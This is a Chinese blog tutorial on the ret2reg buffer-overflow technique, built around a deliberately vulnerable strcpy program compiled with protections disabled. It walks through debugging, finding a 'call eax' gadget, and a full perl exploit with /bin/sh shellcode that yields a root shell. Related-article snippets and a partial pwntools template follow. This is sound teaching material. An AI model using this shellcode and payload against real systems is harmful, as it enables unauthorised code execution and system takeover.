中级ROP之ret2reg

最新推荐文章于 2024-10-20 16:43:41 发布
原创 最新推荐文章于 2024-10-20 16:43:41 发布 · 3.2k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了ret2reg技术的原理与应用,通过分析和调试汇编代码,讲解如何利用该技术注入shellcode并获取shell。同时,文章提供了防御方法及实例分析,帮助读者全面理解ret2reg。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ret2reg

原理

  1. 查看栈溢出返回时哪个寄存器指向缓冲区空间。
  2. 查找对应的call 寄存器或者jmp 寄存器指令,将EIP设置为该指令地址。
  3. 将寄存器所指向的空间上注入shellcode(确保该空间是可以执行的,通常是栈上的)
利用思路
  • 分析和调试汇编,查看溢出函数返回时哪个寄存器指向缓冲区地址
  • 向寄存器指向的缓冲区中注入shellcode
  • 查找call 该寄存器或者jmp 该寄存器指令,并将该指令地址覆盖ret
防御方法

在函数ret之前,将所有赋过值的寄存器全部复位,清0,以避免此类漏洞

Example

此类漏洞常见于strcpy字符串拷贝函数中。

源程序
#include <stdio.h>
#include <string.h>
void evilfunction(char *input) {
        char buffer[512];
        strcpy(buffer, input);
}
int main(int argc, char **argv) {
        evilfunction(argv[1]);
        return 0;
}
编译

开启地址随机化(ASLR)

echo 2 > /proc/sys/kernel/randomize_va_space

进行编译

gcc -Wall -g -o ret2reg ret2reg.c -z execstack -m32 -fno-stack-protector
checksec + IDA分析
[*] '/mnt/hgfs/ubuntu_share/pwn/interrop/ret2reg'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments


int __cdecl main(int argc, const char **argv, const char **envp)
{
  evilfunction((char *)argv[1]);
  return 0;
}
void __cdecl evilfunction(char *input)
{
  char buffer[512]; // [esp+0h] [ebp-208h]

  strcpy(buffer, input);
}
  • 可以看出,程序将argv[1]对应的字符串拷贝进了buffer中,argv[1]就是程序接收的命令行参数。
./ret2reg 123123
  • 123123就是我们输入的第一个命令行参数,其中 $argv[0] 就是脚本文件名,argc[1]为输入的第一个参数
  • 返回evilfunction函数的汇编指令
.text:0804840B                 push    ebp
.text:0804840C                 mov     ebp, esp
.text:0804840E                 sub     esp, 208h
.text:08048414                 sub     esp, 8
.text:08048417                 push    [ebp+input]     ; src
.text:0804841A                 lea     eax, [ebp+buffer]
.text:08048420                 push    eax             ; dest
.text:08048421                 call    _strcpy
.text:08048426                 add     esp, 10h
.text:08048429                 nop
.text:0804842A                 leave
.text:0804842B                 retn
  • 可以看到,lea eax,[ebp+buffer],该指令就是将[ebp + buffer]的偏移地址送给eax,也就相当于eax指向了buffer缓冲区的位置
  • 这时我们就可以向buffer中写入shellcode,并且找到call eax指令地址来覆盖ret,从而拿到shell
  • 这时我们需要查看evilfunction函数返回时,eax是不是还指向缓冲区地址
  • 使用gdb进行调试带参数的程序

gdb --args ret2reg 123123
b *0x0804842B
r

  • 可见eax的值仍为缓冲区的地址
  • 接下来查找call eax或者jmp eax指令
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/interrop# objdump -d ret2reg | grep *%eax
 8048373:	ff d0                	call   *%eax
  • payload就可以构造出来了

payload = shellcode + (0x208 + 4 - len(shellcode)) * a + p32(0x8048373)
Exp
  • 使用prel命令即可打通
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/interrop# ./ret2reg $(perl -e 'printf "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80" . "A"x499 ."\x73\x83\x04\x08"')
# id
uid=0(root) gid=0(root) groups=0(root)
ret2reg缓冲区溢出攻击
沉寂的孤城
10-04 2139
转载请注明出处:http://blog.csdn.net/wangxiaolong_china   被溢出程序源码如下: root@linux:~/pentest# cat vulnerable.c #include #include void evilfunction(char *input) { char buffer[1000]; strcpy(buffe
栈溢出----中级ROP
qq_42192672的博客
10-21 656
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium_rop/ 1.ret2__libc_csu_init 这个主要是争对64位的程序的,和32位的栈传参不同的是,在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,最完美的情况,肯定是需要的寄存器可以通过ROPgadgets找到合适的,但是总有找...
ret2reg
m0_62280492的博客
10-20 1015
简述了中级ROP中的ret2reg及其例题讲解
好好说话之re2reg
热门推荐
hollk’s blog
06-22 1万+
一、原理: 查看溢出函数返回时哪个寄存器指向溢出缓冲区 查找call reg或者jmp reg指令,将EIP设置为指令地址 reg所指向的空间上植入shellcode(确保该空间是可以执行的) 二、BROP BROP(Blind ROP)瞎几把ROP,用在看不到程序C代码和二进制文件的情况下,对程序进行攻击,劫持程序的执行流。就有点像SQL注入当中的盲注,不会直接看到关键的信息,需要一个一个的...
中级ROP
m0_49959202的博客
09-23 626
文章目录中级ROP1.原理1.1 ret2csu1.1.1 libc_csu_init展示1.1.2 可用gadget介绍1.1.3 组合使用gadget思路1.1.4 类似于libc_csu_init,其他可用的gadget1.1.5 利用libc_csu_init尾部偏移,控制其他寄存器1.2 ret2reg1.2.1 原理1.2.2 防御方法1.3 BROP1.3.1 概念1.3.2 攻击条件1.3.3 攻击原理1.3.3.1 栈溢出长度1.3.3.2 Stack Reading1.3.3.3 Bli
ROPRet2libc漏洞
qq_67812668的博客
08-12 1112
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
ROPret2alsolve(32位)详解
06-18
ROPret2alsolve(32位)详解
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 5764
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
中级 rop
weixin_55885866的博客
05-18 118
第一步:利用write()输出write在内存中的地址。gadget是call qword ptr [r12+rbx*8],所以应该使用write.got的地址而不是write.plt的地址。并且为了返回到原程序中,重复利用buffer overflow的漏洞,我们需要继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数为止。链接:https://www.jianshu.com/p/187798890345。商业转载请联系作者获得授权,非商业转载请注明出处。作者:Queen_耳又又。
FPGA——reg2reg路径的时序分析
08-04
本文主要对FPGA的reg2reg路径的时序进行了详细的分析,并列写了时间余量的相关公式。
栈溢出总结之中级ROP
weixin_45097188的博客
03-01 393
ret2csu 原理: (所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。) 在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多时候,我们很难找到每一个寄存器对应的gadgets。而这时我们就可以利用x64下的 __libc_csu_init中的gadgets。这个函数是用来对libc进行初始化操作的,而一般的程...
使用ret2reg攻击绕过地址混淆
海枫的专栏
02-07 7396
本文介绍ret2reg攻击方法,可以绕过地址混淆安全技术
pwn学习-中级ROP-1
WocW的博客
03-03 1102
CTF-wiki-中级ROP实例复现 ret2csu libc_csu_init函数 ctf-wiki上的 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __l...
pwn中级ROP——ret2csu
turtlesd的博客
04-27 1481
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
中级ROP之BROP
至臻求学,胸怀云月
02-25 3379
Blind ROP 基本介绍 于2014年提出,论文题目名为Hacking Blind,BROP是指在没有对应应用程序的源代码或者二进制文件的情况下,对程序进行攻击,劫持程序的执行流。 攻击条件 源程序必须存在栈溢出漏洞,以便于攻击者可以控制程序流程。 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样,目前nginx,mysql,apache,openssh等服务器应...
pwn学习-中级ROP-BROP
WocW的博客
03-06 976
实例复现 先与程序交互 这里直接用本地服务器模拟远程的,但实际上不对原文件进行逆向分析。 其中asdasd为我任意输入的password,可以看出程序的基本交互。这里我们开始 爆破出buffer的长度 exp from pwn import * from LibcSearcher import LibcSearcher def getBufferLength(): i...
CTF-PWN-栈溢出-中级ROP-【栈迁移】
llovewuzhengzi的博客
01-09 1620
所以此时的gadget应该是能够进行栈迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输入数据)。
ret2cussu
最新发布
04-01
经过检索,“ret2cussu”可能是一个拼写错误或者是对现有技术名称的误解。在漏洞利用领域,常见的返回导向编程(ROP)攻击方式包括但不限于 `ret2libc`、`ret2plt` 和 `ret2text` 等。 以下是关于这些常见 ROP 攻击方式的技术描述: ### 常见 ROP 攻击方式概述 #### 1. **Ret2libc** Ret2libc 是一种经典的堆栈溢出攻击方法,通过覆盖目标函数的返回地址来调用 libc 中已有的函数,通常会选择 `system()` 函数并传递参数 `/bin/sh` 来获取 shell[^1]。 实现过程的关键在于找到以下两个要素: - `system()` 的具体地址。 - 字符串 `/bin/sh` 在内存中的位置。 如果程序启用了 ASLR (Address Space Layout Randomization),则需要额外手段绕过随机化机制。 #### 2. **Ret2plt** 当无法直接定位到 libc 地址时,可以通过跳转到 `.plt` 节区内的条目间接调用所需的库函数[^2]。由于 PLT 表项的位置固定不变,即使存在 ASLR 影响也不受影响。 #### 3. **Ret2text** 对于某些特定条件下运行的应用程序来说,如果其本身未启用 NX bit 或其他防护措施,则可以直接重定向执行流回到可执行部分代码段内部某处继续操作[^3]。 基于上述分析可知,并不存在名为 “ret2cussu” 的专门术语或对应技巧;可能是您想了解的是以上提到过的几种经典 rop gadget 利用手法之一,请确认实际需求后再做进一步探讨。 ```python # 示例 Python 脚本用于演示如何计算偏移量以及构造 payload 数据包发送给服务端触发漏洞完成 ret2libc 类型攻击 from pwn import * context.arch = 'amd64' elf = ELF('./vuln') # 加载本地二进制文件实例对象以便后续读取信息如 got plt etc. p = remote('challenge-server', port_number) offset = cyclic_find(0x6161617a) # 使用 pwntools 自带工具寻找崩溃点精确 offset 长度值 payload = b'A' * offset + pack(elf.symbols['puts']) + ... # 构建最终恶意输入字符串序列组合起来形成完整的 exploit chain 结构体形式提交过去即可成功拿下 flag! p.sendline(payload) print(p.recvall()) ```
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

西杭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值